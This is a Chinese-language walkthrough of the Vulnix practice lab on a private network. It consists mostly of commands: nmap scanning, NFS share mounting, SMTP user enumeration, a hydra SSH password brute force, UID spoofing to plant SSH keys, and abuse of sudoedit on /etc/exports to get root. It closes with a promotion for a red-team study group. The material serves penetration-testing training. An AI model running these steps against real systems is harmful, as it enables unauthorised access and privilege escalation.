HackLAB

发现主机

nmap -sP 192.168.20.0/24

Nmap scan report for 192.168.20.157

扫描端口

nmap -sV -p 1-65535 192.168.20.157

开放端口

22/ssh
25/smtp
79/finger
110/pop3
111/rpcbind
143/imap
512/exec
513/login?
514/shell
993/ssl/imap
995/ssl/pop3
2049/nfs
33384/mountd
41063/nlockmgr
42845/mountd
51390/mountd
52848/status

NFS

查询NFS服务器

2049端口开放nfs

nfs网络文件系统，输出网络文件

showmount -e 192.168.20.157

结果：/home/vulnix *

挂载/home/vulnix目录

mkdir /tmp/nfs/
mount -t nfs 192.168.20.157:/home/vulnix /tmp/nfs/
cd /tmp/nfs

权限不够，需要同UID的用户

smtp

扫描25端口

25端口开放smtp邮件服务

nmap -A -p 25 192.168.20.157

用户：vulnix

命令：VRFY, ETRN, STARTTLS

枚举smtp

smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.20.157

过滤用户

枚举结果复制到user.txt文件

vi user.txt
cat user.txt | cut -d ' ' -f2 | cut -d ' ' -f1 >user2.txt

验证用户

finger [email protected]
finger [email protected]
finger [email protected]

三个用户存在

爆破ssh

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.20.157 ssh

结果：

login: user
password: letmein

ssh登录

ssh [email protected]

登录成功

查看passwd文件

cat /etc/passwd

vulnix:x:2008:2008::/home/vulnix:/bin/bash

vulnix的UID为2008

kali创建同uid同名的用户

useradd -u 2008 vulnix
su vulnix
cd /tmp/nfs

在/tmp/nsf创建ssh证书

mkdir .ssh
cd .ssh
ssh-keygen -t rsa
./id_rsa，密码为空

修改密钥

重命名公钥，复制私钥到kali

mv id_rsa.pub authorized_keys
mv id_rsa /tmp/id_rsa
chmod 600 /tmp/id_rsa

登录ssh

使用私钥登录ssh

ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i /tmp/id_rsa [email protected]

提权

sudo -l

可使用sudo命令：sudoedit /etc/exports

修改/etc/exports，挂载root目录

sudoedit /etc/exports
  /root *(rw,no_root_squash)

重启靶机

查看挂载目录

showmount -e 192.168.20.157

kali创建目录

mkdir /tmp/nfs2/
mount -t nfs 192.168.20.157:/root /tmp/nfs2/
cd /tmp/nfs2

创建ssh密钥

mkdir .ssh
cd .ssh
ssh-keygen -t rsa
./id_rsa2 密码空

修改密钥

重命名公钥，复制私钥到kali

mv id_rsa2.pub authorized_keys
mv id_rsa2 /tmp/id_rsa2
chmod 600 /tmp/id_rsa2

登录ssh

使用私钥登录ssh

ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i /tmp/id_rsa2 [email protected]

提权成功

红队全栈教学

可在公众号回复“红队”获取群链接